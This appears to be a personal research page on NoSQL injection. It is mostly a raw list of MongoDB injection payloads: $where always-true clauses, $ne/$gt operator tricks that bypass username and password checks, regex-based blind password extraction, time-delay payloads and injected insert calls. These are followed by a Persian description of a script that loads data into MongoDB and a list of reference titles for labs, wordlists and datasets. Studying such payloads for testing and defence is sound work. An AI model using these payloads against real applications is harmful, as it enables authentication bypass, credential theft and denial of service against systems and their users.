This is my injection research area
Number one:
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
- file name Set_DataToMongo
این کد پایتون انجام کارهای زیر را انجام میدهد:
ابتدا به پایگاه داده مانگو دیبی متصل میشود. سپس اطلاعات را از فایل dataset.json میخواند. در نهایت اطلاعات را به صورت multirow در پایگاه داده مانگو دیبی ذخیره میکند. برای اجرای این کد در PyCharm میتوانید مراحل زیر را انجام دهید:
کد را در PyCharm باز کنید. از طریق منوی Run گزینه Run 'main' را انتخاب کنید. پس از اجرای کد، پیام "Data inserted into MongoDB successfully!" نمایش داده خواهد شد. همچنین اطمینان حاصل کنید که پایگاه داده مانگو دیبی در حال اجرا باشد و فایل dataset.json در همان مسیر قرار داشته باشد.
- Wiki NOSQL
- NOSQL-DataBase
- GO NoSQLi
- NoSQL Injection
- Testing for NoSQLi
- Injection MongoDB
- nosql-injections-classique-blind
- Python NOSQLi username and password
- Wordlist Mongo
- NoSQLi Lab
- Fault-Injection-Dataset
- Synthetic-dataset-for-SQL-Injection
- Injection attacks in apps with NoSQL Backends
- 400 dataset analysis no-sql dataset